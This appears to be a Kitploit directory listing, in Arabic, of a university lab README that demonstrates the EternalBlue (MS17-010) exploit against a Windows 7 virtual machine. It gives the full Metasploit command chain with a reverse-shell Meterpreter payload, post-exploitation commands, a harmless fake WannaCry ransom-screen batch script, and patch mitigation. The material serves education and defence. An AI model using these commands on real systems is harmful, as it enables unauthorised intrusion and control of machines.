Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EternalBlue-Exploit-Demonstration — مختبر أمن سيبراني يوضح استغلال ثغرة CVE-2017-0144 (EternalBlue) باستخدام Metasploit ضد جهاز افتراضي يعمل بنظام Windows 7 ضعيف، لتحقيق وصول على مستوى SYSTEM عبر Meterpreter. يتضمن سلسلة الهجوم الكاملة، ما بعد الاستغلال، والتخفيف عن طريق تصحيح MS17-010، تم اختباره في بيئة مختبرية أخلاقية معزولة. | Kitploit
أدوات/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
أطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالتحليل البرمجيات الخبيثةCTFاختبار الاختراقالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

مختبر أمن سيبراني يوضح استغلال ثغرة CVE-2017-0144 (EternalBlue) باستخدام Metasploit ضد جهاز افتراضي يعمل بنظام Windows 7 ضعيف، لتحقيق وصول على مستوى SYSTEM عبر Meterpreter. يتضمن سلسلة الهجوم الكاملة، ما بعد الاستغلال، والتخفيف عن طريق تصحيح MS17-010، تم اختباره في بيئة مختبرية أخلاقية معزولة.

الفريق الأحمر
مختبرات وتدريب عملي
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد
مشاركة

توضيح استغلال EternalBlue (MS17-010)

معمل أمن سيبراني يوضح استغلال CVE-2017-0144 (EternalBlue) باستخدام Metasploit ضد نظام Windows 7 ضعيف، وتحقيق وصول على مستوى SYSTEM عبر Meterpreter.

يحاكي هذا المشروع أيضًا هجوم فدية من نمط WannaCry (عرض توضيحي آمن) ويوضح التخفيف باستخدام تصحيح MS17-010.


معلومات الوحدة

الوحدة: CSCM828 أمن الثغرات واختبار الاختراق

الطلاب:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

الجامعة: جامعة سوانسي


الموارد والتنزيلات

  1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 Security Update)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Virtual Machines Download)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


1. نظرة عامة

يوضح هذا المعمل:

  • الاستغلال عن بُعد لثغرة SMB (MS17-010)
  • الوصول على مستوى النواة عبر EternalBlue
  • إنشاء جلسة Meterpreter
  • تقنيات ما بعد الاستغلال
  • محاكاة هجوم فدية من نمط WannaCry (آمن)
  • التخفيف عبر التصحيح

2. بيئة المعمل

المتطلبات

  • VMware Workstation / VirtualBox
  • ذاكرة وصول عشوائي 8 جيجابايت كحد أدنى

جهاز المهاجم

  • Kali Linux
  • Metasploit Framework

جهاز الضحية

  • Windows 7 SP1 x64 (غير محدث)

الشبكة

  • وضع المضيف فقط / NAT (بيئة معزولة)
  • تأكد من قدرة كلا الجهازين على التواصل

⚠️ يجب إجراء هذا المعمل في بيئة معزولة تمامًا.


3. إعداد الضحية (Windows 7)

شغّل في موجه أوامر المسؤول:

تعطيل جدار الحماية

root@kitploit:~
netsh advfirewall set allprofiles state off

التحقق من منفذ SMB

root@kitploit:~
netstat -an | findstr :445

تعطيل التحديثات (لاستقرار المعمل)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. إعداد المهاجم (Kali Linux)

التحقق من الاتصال

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. خطوات الاستغلال

الخطوة 1: مسح الهدف

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

المتوقع:

  • المضيف ضعيف (VULNERABLE)

الخطوة 2: تشغيل الاستغلال

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

الخطوة 3: تأكيد الوصول

root@kitploit:~
meterpreter > getuid

المتوقع:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. ما بعد الاستغلال

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

الترحيل المستقر

root@kitploit:~
ps
migrate <explorer.exe PID>

7. محاكاة WannaCry (عرض توضيحي آمن)

إنشاء الحمولة (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

التحميل والتنفيذ

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. التخفيف (توضيح التصحيح)

الخطوة 1: تنزيل التصحيح

  • زر: https://www.catalog.update.microsoft.com/
  • ابحث: KB4012212 Windows 7 x64
  • نزّل ملف .msu

الخطوة 2: تثبيت التصحيح

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

الخطوة 3: إعادة التشغيل

root@kitploit:~
shutdown /r /t 0

الخطوة 4: التحقق من التصحيح

root@kitploit:~
systeminfo | findstr KB4012212

الخطوة 5: إعادة تشغيل الاستغلال

المتوقع:

  • فشل الاستغلال
  • لا توجد جلسة Meterpreter

الخطوة 6: التحقق باستخدام Nmap

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

المتوقع:

  • غير ضعيف (NOT VULNERABLE)

9. حل المشكلات

المشكلةالحل
فشل الاستغلالتحقق من الاتصال
لا توجد جلسةعطّل جدار الحماية
الجلسة تنقطعأعد تشغيل الاستغلال
لا تظهر نافذة مرئيةرحّل إلى explorer.exe

10. الاعتبارات الأخلاقية

يُجرى هذا المشروع:

  • على أجهزة معملية خاضعة للتحكم فقط
  • في شبكة معزولة تمامًا
  • لأغراض تعليمية فقط

الاستخدام غير المصرح به يخالف:

  • قانون إساءة استخدام الحاسوب في المملكة المتحدة لعام 1990

11. الخلاصة

يوضح هذا المعمل:

  • استغلال SMB في العالم الحقيقي باستخدام EternalBlue
  • اختراق Windows 7 على مستوى SYSTEM
  • محاكاة هجوم فدية (آمن)
  • أهمية التصحيح في الوقت المناسب
تنزيل الأداة